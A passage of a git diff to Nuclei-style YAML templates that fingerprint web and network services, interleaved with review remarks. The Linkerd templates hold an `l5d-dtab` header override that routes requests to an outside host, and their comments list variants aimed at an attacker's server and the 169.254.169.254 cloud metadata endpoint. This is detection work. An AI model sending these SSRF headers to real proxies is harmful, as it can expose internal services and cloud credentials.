"Jenkins" - extractors: - type: kval kval: diff --git a/poc/detect/kevinlab-device-detect-8461.yaml b/poc/detect/kevinlab-device-detect-8461.yaml index 6d56bb0b3c..d1b70a5e53 100644 --- a/poc/detect/kevinlab-device-detect-8461.yaml +++ b/poc/detect/kevinlab-device-detect-8461.yaml 
@@ -1,15 +1,18 @@ id: kevinlab-device-detect + info: name: KevinLAB Devices Detection + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. author: gy741 severity: info - description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. tags: iot,kevinlab + requests: - method: GET path: - "{{BaseURL}}/pages/" - "{{BaseURL}}/dashboard/" + matchers-condition: or matchers: - type: word @@ -18,6 +21,7 @@ requests: - '../http/index.php' part: body condition: and + - type: word words: - 'HEMS' diff --git a/poc/detect/linkerd-service-detect-8634.yaml b/poc/detect/linkerd-service-detect-8634.yaml index 068fd47928..bca4269724 100644 --- a/poc/detect/linkerd-service-detect-8634.yaml +++ b/poc/detect/linkerd-service-detect-8634.yaml 
@@ -1,17 +1,23 @@ id: linkerd-service-detect + info: name: Linkerd Service detection author: dudez severity: info - reference: - - https://twitter.com/nirvana_msu/status/1084144955034165248 - tags: tech,linkerd,service + tags: tech,linkerd + reference: https://twitter.com/nirvana_msu/status/1084144955034165248 + + requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - l5d-dtab: /svc/* => /$/inet/interact.sh/443 + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + l5d-dtab: /svc/* => /$/inet/example.com/443 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + matchers-condition: or matchers: - type: regex @@ -21,9 +27,10 @@ requests: - '(?mi)^Via\s*?:.*?linkerd.*$' part: header condition: or + - type: regex regex: - '(?mi)Exceeded .*? binding timeout while resolving name' - '(?mi)exceeded .*? to unspecified while dyn binding' part: body - condition: or + condition: or \ No newline at end of file diff --git a/poc/detect/linkerd-ssrf-detect.yaml b/poc/detect/linkerd-ssrf-detect.yaml index ad99f869a7..16b0eb2d0f 100644 --- a/poc/detect/linkerd-ssrf-detect.yaml +++ b/poc/detect/linkerd-ssrf-detect.yaml @@ -1,5 +1,4 @@ id: linkerd-ssrf-detect - # Detect the Linkerd service by overriding the delegation table and # inspect the response for: # - a "Via: .. linkerd .." @@ -14,19 +13,16 @@ id: linkerd-ssrf-detect # # - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts # - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata - info: name: Linkerd SSRF detection author: dudez severity: info - requests: - method: GET path: - "{{BaseURL}}/" headers: l5d-dtab: /svc/* => /$/inet/example.com/443 - matchers-condition: or matchers: - type: regex 
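Review bot: The rewritten raw request in linkerd-service-detect-8634.yaml has no `description`, even though it sends an `l5d-dtab` override that asks a Linkerd proxy to route the request to `example.com:443`. A proxy that honours the header will therefore open an outbound connection from the scanned host, which an operator reading only `severity: info` and `tags: tech,linkerd` would not expect. Say so in `info`, for example `description: Sends an l5d-dtab delegation override and reports Linkerd from the Via header or dtab binding errors; a proxy that honours it connects out to example.com.` The neighbouring linkerd-ssrf-detect.yaml already carries this explanation as comments. The matcher list continues outside the two hunks of this file.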
@@ -34,31 +30,26 @@ requests: regex: - '(?mi)^Via\s*?:.*?linkerd.*$' part: header - - type: regex name: l5d-err-present regex: - '(?mi)^l5d-err:.*$' part: header - - type: regex name: l5d-success-class-present regex: - '(?mi)^l5d-success-class: 0.*$' part: header - - type: word name: ssrf-response-body words: - '

This domain is for use in illustrative examples in documents.' part: body - - type: regex name: resolve-timeout-error-present regex: - '(?mi)Exceeded .*? binding timeout while resolving name' part: body - - type: regex name: dynbind-error-present regex: diff --git a/poc/detect/lucee-detect-8661.yaml b/poc/detect/lucee-detect-8661.yaml index c6751e5e62..773582565f 100644 --- a/poc/detect/lucee-detect-8661.yaml +++ b/poc/detect/lucee-detect-8661.yaml @@ -1,15 +1,24 @@ id: lucee-detect + info: name: Detect Lucee - author: geeknik - description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ + author: geeknik,DhiyaneshDK severity: info + description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ + metadata: + max-request: 2 + shodan-query: "html:\"Lucee\"" + fofa-query: "app=\"Lucee-Engine\"" tags: tech,lucee -requests: + +http: - method: GET path: + - "{{BaseURL}}/lucee/doc/functions.cfm" - "{{BaseURL}}" - matchers-condition: and + + stop-at-first-match: true + matchers-condition: or matchers: - type: regex part: header @@ -18,6 +27,9 @@ requests: - "(?i)X-CB-Server: LUCEE" - "(?i)X-IDG-Appserver: Lucee" condition: or - - type: status - status: - - 200 + + - type: word + part: body + words: + - "Lucee Function Reference" +# digest: 4a0a00473045022075f26792907c6d74be5f38bbe41be081199595519e306502ecd4bdfee409f2f7022100b02b3b2ac7b94271edb6835e15e0b302f6270605125e9312412d075effba137d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/lucee-detect.yaml b/poc/detect/lucee-detect.yaml index c6751e5e62..e4cd2663f7 100644 --- a/poc/detect/lucee-detect.yaml +++ b/poc/detect/lucee-detect.yaml 
@@ -4,13 +4,14 @@ info: author: geeknik description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development -- https://github.com/lucee/Lucee/ severity: info - tags: tech,lucee + requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and + matchers: + - type: regex part: header regex: @@ -18,6 +19,3 @@ requests: - "(?i)X-CB-Server: LUCEE" - "(?i)X-IDG-Appserver: Lucee" condition: or - - type: status - status: - - 200 diff --git a/poc/detect/magmi-detect.yaml b/poc/detect/magmi-detect.yaml index a18b5b4ae5..b78bd29310 100644 --- a/poc/detect/magmi-detect.yaml +++ b/poc/detect/magmi-detect.yaml @@ -3,7 +3,7 @@ info: name: MAGMI (Magento Mass Importer) Plugin Detect author: dwisiswant0 severity: info - tags: magento,magmi + tags: magento,magmi,plugin requests: - method: GET path: diff --git a/poc/detect/microsoft-echange-server-detect.yaml b/poc/detect/microsoft-echange-server-detect.yaml index a07f331300..10eacbc4b1 100644 --- a/poc/detect/microsoft-echange-server-detect.yaml +++ b/poc/detect/microsoft-echange-server-detect.yaml @@ -1,5 +1,4 @@ id: microsoft-exchange-server-detect - info: name: Microsoft Exchange Server Detect author: pikpikcu,dhiyaneshDK @@ -7,25 +6,20 @@ info: reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse description: Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, using Outlook Web App path data. tags: microsoft,exchange,tech - requests: - method: GET path: - "{{BaseURL}}/owa/auth/logon.aspx" - matchers-condition: or matchers: - - type: regex regex: - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all - - type: word words: - 'Exchange Log In' - 'Microsoft Exchange - Outlook Web Access' - extractors: - type: kval kval: diff --git a/poc/detect/moinmoin-detect-8917.yaml b/poc/detect/moinmoin-detect-8917.yaml index 9edb739dd7..948f4cd509 100644 
--- a/poc/detect/moinmoin-detect-8917.yaml +++ b/poc/detect/moinmoin-detect-8917.yaml @@ -1,5 +1,4 @@ id: moinmoin-detect - info: name: MoinMoin wiki detect author: cyllective @@ -7,15 +6,11 @@ info: description: Detects MoinMoin Wiki reference: - https://github.com/moinwiki/moin-1.9 - metadata: - max-request: 1 tags: tech,moin,moinmoin,wiki - -http: +requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word @@ -24,16 +19,12 @@ http: words: - 'MoinMoin Powered' - 'Python Powered' - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - '\/moin_static(\w+)\/' - -# digest: 4a0a00473045022020464642125d41dfbeb5f6e8a10bf68a20e324c5f20f07d48ad9209d75ea0cad022100cf508e9ed48c5986a1157850375f0bb50610bfb7cb91d265756cf22522670523:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/mrtg-detect-8958.yaml b/poc/detect/mrtg-detect-8958.yaml index ebc3139904..fe48bb2308 100644 --- a/poc/detect/mrtg-detect-8958.yaml +++ b/poc/detect/mrtg-detect-8958.yaml @@ -1,23 +1,36 @@ id: mrtg-detect + info: name: Detect MRTG author: geeknik - description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info -requests: + description: The Multi Router Traffic Grapher + reference: + - https://oss.oetiker.ch/mrtg/ + metadata: + max-request: 3 + tags: tech,mrtg + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/mrtg/" - "{{BaseURL}}/MRTG/" + + stop-at-first-match: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: - "MRTG Index Page" - "Multi Router Traffic Grapher" condition: and + +# digest: 490a0046304402202c89cdfa5c15dc928a0cb84f44ab05f5c5a0fbc8b8d2bd14a61a09f9a276ad3202206577f6bd0dca4b7a830874a22a5053ecf8d54fbbdc2674c49c43d99b5fbb1837:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/mrtg-detect.yaml b/poc/detect/mrtg-detect.yaml index ebc3139904..19a062f6fa 100644 --- a/poc/detect/mrtg-detect.yaml 
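Review bot: Reverting `http:` to the legacy `requests:` key in moinmoin-detect-8917.yaml, and dropping `metadata: max-request: 1` and the trailing `# digest:` line, runs against the rest of this patch. froxlor-detect-7552.yaml, grav-cms-detect-7842.yaml and mrtg-detect-8958.yaml all move from `requests:` to `http:` and gain a digest. It looks as if an older copy of the template overwrote a newer signed one; that is an inference from the diff, not something the page states. Unless the downgrade is intended, keep `http:`, the `max-request` metadata and the signature line, so the template stays in the current format and its provenance can still be checked.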
+++ b/poc/detect/mrtg-detect.yaml @@ -4,12 +4,14 @@ info: author: geeknik description: The Multi Router Traffic Grapher -- https://oss.oetiker.ch/mrtg/ severity: info + requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/mrtg/" - "{{BaseURL}}/MRTG/" + matchers-condition: and matchers: - type: status diff --git a/poc/detect/neos-detect.yaml b/poc/detect/neos-detect.yaml index 793d2f1421..754415fda3 100644 --- a/poc/detect/neos-detect.yaml +++ b/poc/detect/neos-detect.yaml @@ -2,12 +2,9 @@ id: neos-detect info: name: Neos CMS detection author: k11h-de + description: some Neos websites remove the X-Flow-Powered Header, but they usually all have a comment line at the top of the body severity: info - description: Neos CMS was detected. - reference: - - https://github.com/neos/ - classification: - cwe-id: CWE-200 + reference: https://github.com/neos/ tags: tech,neos,cms requests: - method: GET @@ -23,5 +20,3 @@ requests: - type: kval kval: - 'x_flow_powered' - -# Enhanced by mp on 2022/04/01 diff --git a/poc/detect/nexus-detect.yaml b/poc/detect/nexus-detect.yaml index c14e18f275..e8b8d0e84b 100644 --- a/poc/detect/nexus-detect.yaml +++ b/poc/detect/nexus-detect.yaml 
@@ -1,19 +1,23 @@ -id: nexus-detect -info: - name: Nexus Repository Manager (NRM) Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor - tags: tech,nexus -requests: - - method: GET - path: - - "{{BaseURL}}/service/rest/swagger.json" - matchers-condition: and - matchers: - - type: word - words: - - "Nexus Repository Manager" - - type: status - status: - - 200 +id: nexus-detect + +info: + name: Nexus Repository Manager (NRM) Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor + tags: tech,nexus + +requests: + - method: GET + path: + - "{{BaseURL}}/service/rest/swagger.json" + + matchers-condition: and + matchers: + - type: word + words: + - "Nexus Repository Manager" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/oauth2-detect.yaml b/poc/detect/oauth2-detect.yaml index 53cc1456fe..fd9066a622 100644 --- a/poc/detect/oauth2-detect.yaml +++ b/poc/detect/oauth2-detect.yaml 
@@ -1,28 +1,28 @@ -id: oauth2-detect - -info: - name: OAuth 2.0 Authorization Server Detection Template - author: righettod - severity: info - description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint - tags: tech,oauth - -requests: - - method: POST - path: - - "{{BaseURL}}/oauth/token" - - body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" - - matchers-condition: and - matchers: - - type: status - status: - - 401 - - 400 - condition: or - - - type: word - part: body - words: +id: oauth2-detect + +info: + name: OAuth 2.0 Authorization Server Detection Template + author: righettod + severity: info + description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint + tags: tech,oauth + +requests: + - method: POST + path: + - "{{BaseURL}}/oauth/token" + + body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx" + + matchers-condition: and + matchers: + - type: status + status: + - 401 + - 400 + condition: or + + - type: word + part: body + words: - 'error":"invalid_client"' \ No newline at end of file diff --git a/poc/detect/octobercms-detect-9196.yaml b/poc/detect/octobercms-detect-9196.yaml index 6a51fee4d3..341fa66503 100644 --- a/poc/detect/octobercms-detect-9196.yaml +++ b/poc/detect/octobercms-detect-9196.yaml @@ -1,4 +1,5 @@ id: octobercms-detect + info: name: OctoberCMS detect author: cyllective 
@@ -6,21 +7,28 @@ info: description: Detects OctoberCMS reference: - https://github.com/octobercms/october + metadata: + max-request: 2 tags: tech,octobercms -requests: + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/modules/system/assets/js/framework.combined-min.js" + stop-at-first-match: true - redirects: true + host-redirects: true max-redirects: 1 matchers: - type: word part: header words: - 'october_session' + - type: word part: body words: - 'OctoberCMS' + +# digest: 4a0a0047304502205f8da2c9d61947da70d15737e9d29ed649cd7a28e03643c76710a92c8cf6371d022100b05d06ccfab06cd9c0a2c55862b8a29c5d0db2b9fe168b637ea926fc476f6384:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/oipm-detect-9219.yaml b/poc/detect/oipm-detect-9219.yaml index 2350460752..8130790a6a 100644 --- a/poc/detect/oipm-detect-9219.yaml +++ b/poc/detect/oipm-detect-9219.yaml @@ -1,16 +1,9 @@ id: oipm-detect info: - name: One Identity Password Manager Detection - description: One Identity Password Manager is a secure password manager that gives enterprises control over password management, policies, and automated reset functions. + name: One Identity Password Manager detection author: nodauf severity: info tags: panel - remediation: Ensure proper access. - reference: https://www.oneidentity.com/techbrief/security-guide-for-password-manager821177/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 requests: - method: GET path: @@ -19,5 +12,3 @@ requests: - type: word words: - "One Identity Password Manager" - -# Enhanced by mp on 2022/02/10 diff --git a/poc/detect/openx-detect.yaml b/poc/detect/openx-detect.yaml index 9d76d1fab6..0d1a1418f2 100644 --- a/poc/detect/openx-detect.yaml +++ b/poc/detect/openx-detect.yaml 
@@ -1,30 +1,27 @@ id: openx-detect - info: name: OpenX detect author: pikpikcu severity: info tags: tech,openx - requests: - method: GET path: - - "{{BaseURL}}/www/admin/" - + - "{{BaseURL}}/www/admin/index.php" + - "{{BaseURL}}/admin/index.php" + stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body regex: - 'OpenX' - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - - 'content="(.*)- http://www.openx.org">' + - '(.*)- http://www.openx.org' diff --git a/poc/detect/php-proxy-detect-9544.yaml b/poc/detect/php-proxy-detect-9544.yaml index 16d49d2f3b..3978ef9413 100644 --- a/poc/detect/php-proxy-detect-9544.yaml +++ b/poc/detect/php-proxy-detect-9544.yaml @@ -1,26 +1,35 @@ id: php-proxy-detect + info: name: PHP Proxy Detect author: pikpikcu severity: info + metadata: + max-request: 2 tags: tech,php,proxy -requests: + +http: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/proxy" + matchers-condition: and matchers: - type: word part: body words: - "PHP-Proxy" + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - '' + +# digest: 490a0046304402207b3bef18d95acf42b957d883ee45f5b8190c3e65ec36d4396fc711b1475d80d8022047ca111f8d9b193176ee4cdfa87cba20bfc0236f15921cd92606afa3d93191e7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/pi-hole-detect-9581.yaml b/poc/detect/pi-hole-detect-9581.yaml index 246c2319aa..4240a1feaf 100644 --- a/poc/detect/pi-hole-detect-9581.yaml +++ b/poc/detect/pi-hole-detect-9581.yaml @@ -3,6 +3,7 @@ info: name: pi-hole detector author: geeknik severity: info + tags: tech,pihole requests: - method: GET path: diff --git a/poc/detect/prometheus-exporter-detect-9676.yaml b/poc/detect/prometheus-exporter-detect-9676.yaml index c581c3448c..e0f4bf47fe 100644 --- a/poc/detect/prometheus-exporter-detect-9676.yaml +++ b/poc/detect/prometheus-exporter-detect-9676.yaml 
@@ -10,8 +10,6 @@ requests: - method: GET path: - "{{BaseURL}}" - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers-condition: and matchers: - type: word diff --git a/poc/detect/prtg-detect.yaml b/poc/detect/prtg-detect.yaml index c57d90484d..e24606ba47 100644 --- a/poc/detect/prtg-detect.yaml +++ b/poc/detect/prtg-detect.yaml @@ -4,14 +4,12 @@ info: author: geeknik description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg severity: info - requests: - method: GET path: - "{{BaseURL}}/index.htm" - "{{BaseURL}}/prtg/index.htm" - "{{BaseURL}}/PRTG/index.htm" - matchers-condition: and matchers: - type: status @@ -22,12 +20,10 @@ requests: words: - "PRTG Network Monitor" condition: and - - type: regex part: header regex: - PRTG - extractors: - type: kval part: header diff --git a/poc/detect/puppetserver-detect-9723.yaml b/poc/detect/puppetserver-detect-9723.yaml index 8b9e32851b..83c9bcabdf 100644 --- a/poc/detect/puppetserver-detect-9723.yaml +++ b/poc/detect/puppetserver-detect-9723.yaml 
@@ -1,29 +1,40 @@ id: puppetserver-detect + info: name: Puppetserver Detection author: c-sh0 severity: info - reference: https://insinuator.net/2020/09/puppet-assessment-techniques/ - tags: tech,puppet,exposure -requests: + reference: + - https://insinuator.net/2020/09/puppet-assessment-techniques/ + metadata: + max-request: 1 + tags: tech,puppet,exposure,intrusive + +http: - method: GET path: - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}" + matchers-condition: and matchers: - type: status status: - 404 + - type: word part: header words: - "x-puppet-version" case-insensitive: true + - type: word part: body words: - "{{randstr}}" + extractors: - type: kval kval: - x_puppet_version + +# digest: 4b0a004830460221009da8fdf7d343803bb76c86b36935e485784f03258b9285ef838fe1bddacf115e02210080939b191b4e6ebd534a1d86ad859bd1cf566f2493f8bf5aa4c26768786edf80:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/ranger-detection-9830.yaml b/poc/detect/ranger-detection-9830.yaml index d299f2c75d..9ee92b5956 100644 --- a/poc/detect/ranger-detection-9830.yaml +++ b/poc/detect/ranger-detection-9830.yaml 
@@ -1,29 +1,25 @@ -id: ranger-detection - -info: - name: Apache Ranger Detection - author: For3stCo1d - severity: info - tags: tech,apache,ranger - metadata: - shodan-query: http.title:"Ranger - Sign In" - reference: https://github.com/apache/ranger - -requests: - - method: GET - path: - - '{{BaseURL}}/login.jsp' - - "{{BaseURL}}/images/favicon.ico" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - " Ranger - Sign In" - - - type: dsl - name: favicon - dsl: - - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" +id: ranger-detection +info: + name: Apache Ranger Detection + author: For3stCo1d + severity: info + tags: tech,apache,ranger + metadata: + shodan-query: http.title:"Ranger - Sign In" + reference: https://github.com/apache/ranger +requests: + - method: GET + path: + - '{{BaseURL}}/login.jsp' + - "{{BaseURL}}/images/favicon.ico" + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - " Ranger - Sign In" + - type: dsl + name: favicon + dsl: + - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" diff --git a/poc/detect/rdp-detect-9840.yaml b/poc/detect/rdp-detect-9840.yaml index ebe93db4f3..051db6c51d 100644 --- a/poc/detect/rdp-detect-9840.yaml +++ b/poc/detect/rdp-detect-9840.yaml @@ -1,25 +1,22 @@ id: rdp-detect + info: name: Windows RDP Detection author: princechaddha severity: info - metadata: - verified: true - tags: network,windows,rdp + tags: windows,rdp,network + network: - inputs: - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" type: hex read-size: 2048 + host: - - "{{Host}}:3389" - "{{Hostname}}" + - "{{Host}}:3389" + matchers: - - type: word - name: rdp - encoding: hex - words: - - "030000130ed" - type: word encoding: hex name: win2000 
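Review bot: Removing the generic `rdp` matcher (hex word `030000130ed`) from rdp-detect-9840.yaml leaves only the OS-specific fingerprints. An RDP listener whose negotiation reply is not one of the listed full responses is then reported as nothing at all. The second hunk of this file narrows coverage further by deleting the `win2012R2` word. For an exposure inventory a missed RDP service costs more than an unlabelled one, so keep the short-prefix matcher as a fallback next to the named fingerprints. The matcher list continues outside this hunk.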
@@ -55,11 +52,6 @@ network: name: win2012R2OR8 words: - "030000130ed00000123400020f080002000000" - - type: word - encoding: hex - name: win2012R2 - words: - - "030000130ed00000123400020f080008000000" - type: word encoding: hex name: win2016 diff --git a/poc/detect/redcap-detector-9850.yaml b/poc/detect/redcap-detector-9850.yaml index a3619bb47c..92d8687e1b 100644 --- a/poc/detect/redcap-detector-9850.yaml +++ b/poc/detect/redcap-detector-9850.yaml @@ -1,16 +1,13 @@ id: redcap-detector - info: name: REDCap detector author: philippedelteil,retr0 severity: info tags: redcap,tech - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word @@ -18,11 +15,9 @@ requests: - 'REDCap' - 'Vanderbilt University' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/detect/redmine-cli-detect-9854.yaml b/poc/detect/redmine-cli-detect-9854.yaml index ba7f5a1b5b..fcd31af4f4 100644 --- a/poc/detect/redmine-cli-detect-9854.yaml +++ b/poc/detect/redmine-cli-detect-9854.yaml @@ -14,9 +14,9 @@ requests: - type: word part: body words: - - "default" - - "my_id" - - "root_url" + - default + - my_id + - root_url condition: and - type: status status: diff --git a/poc/detect/rhymix-cms-detect.yaml b/poc/detect/rhymix-cms-detect.yaml index 6314a0e45f..2e2299fb4f 100644 --- a/poc/detect/rhymix-cms-detect.yaml +++ b/poc/detect/rhymix-cms-detect.yaml @@ -1,22 +1,26 @@ id: rhymix-cms-detect + info: name: Rhymix CMS Detect author: gy741 severity: info description: Detects Rhymix CMS - reference: - - https://github.com/rhymix/rhymix tags: tech,rhymix + reference: https://github.com/rhymix/rhymix + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: or matchers: + - type: word part: header words: - 'rx_sesskey1' + - type: word part: body words: diff --git a/poc/detect/samba-detect-9988.yaml b/poc/detect/samba-detect-9988.yaml index 1bd21fd9d7..433010b743 100644 --- a/poc/detect/samba-detect-9988.yaml 
+++ b/poc/detect/samba-detect-9988.yaml @@ -1,15 +1,8 @@ id: samba-detection info: - name: Samba Detection + name: samba detection author: pussycat0x severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - reference: - - https://www.samba.org/samba/what_is_samba.html - - https://www.samba.org/samba/history/security.html - classification: - cwe-id: CWE-200 - remediation: Always apply the latest security patch. tags: network,smb,samba network: - inputs: @@ -22,4 +15,3 @@ network: - type: word words: - "SMBr" -# Enhanced by mp on 2022/02/09 diff --git a/poc/detect/sap-netweaver-detect-10044.yaml b/poc/detect/sap-netweaver-detect-10044.yaml index edbd2eaef5..9fe826a6f5 100644 --- a/poc/detect/sap-netweaver-detect-10044.yaml +++ b/poc/detect/sap-netweaver-detect-10044.yaml @@ -1,14 +1,17 @@ id: sap-netweaver-detect + info: name: SAP NetWeaver ICM Detection author: randomstr1ng - severity: info description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) + severity: info tags: sap,webserver + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers: @@ -19,6 +22,7 @@ requests: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or + extractors: - type: kval part: header diff --git a/poc/detect/secmail-detect.yaml b/poc/detect/secmail-detect.yaml index 71b8405b65..45536712b0 100644 --- a/poc/detect/secmail-detect.yaml +++ b/poc/detect/secmail-detect.yaml @@ -3,7 +3,8 @@ info: name: SecMail - secure email Detect author: johnk3r severity: info - reference: https://www.shodan.io/search?query=secmail + reference: + - https://www.shodan.io/search?query=secmail tags: secmail,panel requests: - method: GET diff --git a/poc/detect/seeddms-detect-10129.yaml b/poc/detect/seeddms-detect-10129.yaml index 307611e1d0..1c313a8fde 100644 --- a/poc/detect/seeddms-detect-10129.yaml +++ b/poc/detect/seeddms-detect-10129.yaml 
@@ -1,21 +1,21 @@ -id: seeddms-detect -info: - name: Seeddms- - author: pussycat0x - severity: info - tags: tech -requests: - - method: GET - path: - - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - "SeedDMS: Sign in" - - type: status - status: +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/detect/shiro-detect.yaml b/poc/detect/shiro-detect.yaml index b918ac9d43..d1b92dd808 100644 --- a/poc/detect/shiro-detect.yaml +++ b/poc/detect/shiro-detect.yaml @@ -3,14 +3,17 @@ info: name: Detect Shiro Framework author: AresX severity: info + tags: tech,shiro requests: - method: GET path: - '{{BaseURL}}' headers: - Cookie: rememberMe=123; + Cookie: JSESSIONID={{randstr}};rememberMe=123; + redirects: true + max-redirects: 2 matchers: - type: word - words: - - rememberMe=deleteMe part: header + words: + - "rememberMe=deleteMe" diff --git a/poc/detect/shopware-detect.yaml b/poc/detect/shopware-detect.yaml index 2765f4f1d3..edf59386b6 100644 --- a/poc/detect/shopware-detect.yaml +++ b/poc/detect/shopware-detect.yaml @@ -7,16 +7,12 @@ info: reference: - https://github.com/shopware/shopware - https://github.com/shopware/platform - metadata: - verified: true - shodan-query: title:"shopware AG" tags: tech,shopware,cms requests: - method: GET path: - "{{BaseURL}}/admin" - "{{BaseURL}}/backend" - stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/detect/strapi-cms-detect.yaml b/poc/detect/strapi-cms-detect.yaml index c08945df08..530e120e7e 100644 
--- a/poc/detect/strapi-cms-detect.yaml +++ b/poc/detect/strapi-cms-detect.yaml @@ -1,5 +1,4 @@ id: strapi-cms-detect - info: name: Strapi CMS detect author: cyllective,daffainfo,idealphase @@ -8,12 +7,10 @@ info: reference: - https://github.com/strapi/strapi tags: tech,strapi,cms - requests: - method: GET path: - "{{BaseURL}}/admin/init" - matchers-condition: and matchers: - type: word @@ -23,11 +20,9 @@ requests: - '"uuid"' - '"hasAdmin"' condition: and - - type: status status: - 200 - extractors: - type: regex part: body diff --git a/poc/detect/tech-detect-10672.yaml b/poc/detect/tech-detect-10672.yaml index 0f825bbc34..bcc54813d1 100644 --- a/poc/detect/tech-detect-10672.yaml +++ b/poc/detect/tech-detect-10672.yaml @@ -261,14 +261,6 @@ requests: - "<[^>]+sc-component-id: sc-" condition: or part: body - - type: regex - name: prestashop - regex: - - Powered by ]+>PrestaShop - - - - - condition: or - part: body - type: regex name: youtrack regex: 
@@ -344,12 +336,6 @@ requests: - ]+smartadserver\.com\/call condition: or part: body - - type: regex - name: wordpress-super-cache - regex: - - " + - type: word + name: dynamicweb + words: + - 'content="Dynamicweb ' + - type: word + name: E+-cms + words: + - 'content="e-plus ' + - type: word + name: e-monsite + words: + - 'content="e-monsite (e-monsite.com)"' + - type: word + name: ecshop + words: + - 'content="ECSHOP ' + - type: word + name: easysite + words: + - 'content="Ideagen - WCM ' + - type: word + name: episerver + words: + - 'src="https://dl.episerver.net/' + - type: word + name: everweb + words: + - 'content="EverWeb ' + - type: word + name: fork-cms + words: + - 'content="Fork CMS"' + - type: word + name: zeta-producer + words: + - 'content="Zeta Producer ' + - type: word + name: gx-web-manager + words: + - 'content="GX WebManager' + - type: word + name: getsimple-cms + words: + - 'content="GetSimple"' + - type: word + name: ghost + words: + - 'content="Ghost ' + - type: word + name: go-daddy-website-builder + words: + - 'content="Starfield Technologies; Go Daddy Website Builder' + - type: word + name: government-site-builder + words: + - 'content="Government Site Builder"' + - type: word + name: graffiticms + words: + - 'content="Graffiti CMS' + - type: word + name: grav-cms + words: + - 'content="GravCMS"' + - type: word + name: drupal + words: + - 'content="Drupal' + - type: word + name: webnode + words: + - 'content="Webnode' + - type: word + name: shopsys + words: + - "'Shopsys\\" + - type: word + name: pluck-cms + words: + - 'content="pluck ' + - type: word + name: homestead + words: + - 'content="Homestead SiteBuilder"' + - type: word + name: hostedshop + words: + - 'content="HostedShop"' + - type: word + name: 